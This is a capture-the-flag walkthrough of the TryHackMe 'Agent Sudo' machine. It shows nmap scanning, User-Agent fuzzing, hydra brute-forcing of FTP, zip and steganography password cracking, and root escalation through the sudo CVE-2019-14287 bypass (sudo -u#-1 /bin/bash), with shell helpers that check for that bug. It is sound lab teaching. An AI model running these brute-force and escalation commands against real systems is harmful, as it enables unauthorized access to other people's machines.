Recon
Nmap
As usual, we start with an nmap scan:
sudo nmap -sV -A -T4 10.10.227.114 -oN nmap_results.txt
"PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement"
Three services are exposed: FTP (vsftpd 3.0.3), SSH (OpenSSH 7.6p1) and HTTP (Apache 2.4.29).
HTTP server
Homepage
The homepage tells agents to use their codename as the User-Agent to access the site. It is signed by Agent R, so the codenames look like single letters.
Robots
robots.txt contains nothing useful.
FTP
Anonymous login to the FTP server is refused.
Codenames
Since R is a single-letter codename, we try every letter of the alphabet as the User-Agent.
printf '%s\n' {A..Z} > alphabet.txt   # bash brace expansion: one letter per line
ffuf -w ./alphabet.txt -u http://10.10.201.112 -H "User-Agent: FUZZ" -fc 200 -fs 218 -fmode and -o ffuf_results.txt
# User-Agents C and R return a different response (a redirect to their own page)
curl -A "C" -L http://10.10.201.112:80/
"Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R"
curl -A "R" -L http://10.10.201.112:80/
"What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>
<html>
<head>
<title>Annoucement</title>
</head>
<body>
<p>
Dear agents,
<br><br>
Use your own <b>codename</b> as user-agent to access the site.
<br><br>
From,<br>
Agent R
</p>
</body>
</html>"
Note: by default I filter on both status code and response size (-fc 200 -fs 218 with -fmode and, so a response is hidden only when it matches both). An interesting response may differ in either; here the C and R responses were redirects rather than 200s. We also pass -L to curl so it follows the redirect to the actual page.
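The same probe done by hand, as an added example that is not part of the original writeup: one curl request per letter, followed by an awk pass that keeps only the responses whose status code and size differ from the most common pair (what ffuf's -fc/-fs with -fmode and hide). The target URL and the "letter status size" lines fed to find_outliers are assumptions and constructed sample data, not output captured from the box.

```shell
# Added example: manual User-Agent fuzzing plus outlier detection.
# Assumes curl is installed and the target URL is reachable.

# Print "letter status size" for each single-letter User-Agent.
# Usage: fuzz_user_agents http://10.10.201.112/
fuzz_user_agents() {
    url=$1
    for letter in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
        # -s silent, -o discard the body, -w print status code and body size
        printf '%s %s\n' "$letter" \
            "$(curl -s -A "$letter" -o /dev/null -w '%{http_code} %{size_download}' "$url")"
    done
}

# Read "letter status size" lines on stdin and print those whose
# status+size pair is not the most common one (the baseline page).
# This is the manual equivalent of ffuf's -fc/-fs with -fmode and.
find_outliers() {
    awk '
        { key[NR] = $2 " " $3; line[NR] = $0; count[$2 " " $3]++ }
        END {
            best = ""; bestn = 0
            for (k in count) if (count[k] > bestn) { best = k; bestn = count[k] }
            for (i = 1; i <= NR; i++) if (key[i] != best) print line[i]
        }'
}

# Typical run against a live target (constructed URL):
#   fuzz_user_agents http://10.10.201.112/ | find_outliers
```

A redirect shows up here as a 3xx status with the size of the redirect body, which is why filtering on size alone would have hidden the C and R responses if the redirect page happened to be the same size as the announcement.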
We learn that Agent C is chris, and that his password is weak.
FTP Server
Since the note says chris's password is weak, we brute-force it against FTP with hydra and rockyou:
hydra -t 32 -l chris -P /usr/share/wordlists/rockyou.txt 10.10.201.112 ftp -I -o hydra_results.txt
"Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-17 15:48:41
[DATA] max 32 tasks per 1 server, overall 32 tasks, 14344399 login tries (l:1/p:14344399), ~448263 tries per task
[DATA] attacking ftp://10.10.201.112:21/
[21][ftp] host: 10.10.201.112 login: chris password: <password>
"
With the recovered password we log in to the FTP server as chris and download everything:
ftp 10.10.201.112
# chris
# <password>
ls
"-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png"
get To_agentJ.txt
get cute-alien.jpg
get cutie.png
exit
cat To_agentJ.txt
"Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C"
We use binwalk to find and extract data appended to or embedded in the images:
binwalk -e cutie.png
binwalk -e cute-alien.jpg
cd _cutie.png.extracted
ls
"365 365.zlib 8702.zip To_agentR.txt"
cat To_agentR.txt
""
# The extracted To_agentR.txt is empty: 8702.zip is password-protected, so binwalk could not extract its contents. We crack the archive password with john.
zip2john 8702.zip > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
"<password> (8702.zip/To_agentR.txt)"
7z e 8702.zip   # enter the password john recovered when prompted
cat To_agentR.txt
"Agent C,
We need to send the picture to '<base64>' as soon as possible!
By,
Agent R
"
# The quoted value is base64 (the author's placeholder says so), so decoding it with base64 -d is the first thing to check. Stegseek takes the brute-force route: it tries each wordlist entry as the steghide passphrase for the JPEG and, on success, writes the embedded file to <image>.out.
stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt
cat cute-alien.jpg.out
"
Hi james,
Glad you find this message. Your login password is <password>
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
"
With james's password recovered from the image, we can now log in over SSH.
Entering Machine
ssh james@10.10.201.112
ls
"Alien_autospy.jpg user_flag.txt"
cat user_flag.txt
sudo -l
"Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash"
Searching for the (ALL, !root) /bin/bash runas rule turns up CVE-2019-14287: sudo versions before 1.8.28 accept a user ID of -1 (-u#-1, or its unsigned form -u#4294967295), resolve it to 0 and run the command as root despite the !root exclusion, so a ready-made exploit exists for exactly this configuration.
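Before running a downloaded exploit, a practitioner would confirm the two preconditions: a sudo older than 1.8.28 and a runas rule that excludes root. The following is an added example, not the writeup's exploit.py: POSIX shell functions that parse a sudo -V banner and sudo -l output and report whether the host matches CVE-2019-14287. The banner strings in the comments are constructed; the page does not show the box's sudo version.

```shell
# Added example: check the preconditions for CVE-2019-14287 before exploiting.
# Assumes only sed, sort, grep and head; the banners below are constructed.

# Return 0 when version $1 is strictly older than $2 (dotted numeric
# versions; a trailing suffix such as "p2" is ignored).
version_lt() {
    a=$(printf '%s' "$1" | sed 's/[^0-9.].*//')
    b=$(printf '%s' "$2" | sed 's/[^0-9.].*//')
    [ "$a" != "$b" ] &&
        [ "$(printf '%s\n%s\n' "$a" "$b" | sort -t. -k1,1n -k2,2n -k3,3n | head -n1)" = "$a" ]
}

# Extract the version from the first line of `sudo -V`,
# e.g. "Sudo version 1.8.21p2" -> "1.8.21p2".
sudo_version_from_banner() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.]*[a-z0-9]*\).*/\1/p'
}

# Return 0 (affected) when the banner's sudo is older than 1.8.28,
# the release that fixed CVE-2019-14287.
cve_2019_14287_affected() {
    v=$(sudo_version_from_banner "$1")
    [ -n "$v" ] && version_lt "$v" 1.8.28
}

# Return 0 when `sudo -l` output contains a runas list that excludes root,
# e.g. "(ALL, !root) /bin/bash". Without such a rule the bug gains nothing.
has_negated_root_rule() {
    printf '%s\n' "$1" | grep -q '([^)]*!root)'
}

# On the target, run this instead of trusting the exploit blindly:
#   if cve_2019_14287_affected "$(sudo -V | head -n1)" &&
#      has_negated_root_rule "$(sudo -l)"; then
#       sudo -u#-1 /bin/bash   # uid -1 is mis-resolved to 0 on affected versions
#   fi
```

The version comparison deliberately drops the "pN" patch suffix: Ubuntu's sudo package reports e.g. 1.8.21p2, and the fix landed in the 1.8.28 release line, so only the dotted part matters for this check.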
Privilege Escalation
python3 exploit.py   # the published exploit for CVE-2019-14287; by hand: sudo -u#-1 /bin/bash
# We are now root
cat /root/root.txt
"
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
<flag>
By,
<Agent-R> a.k.a Agent R
"
Kanelao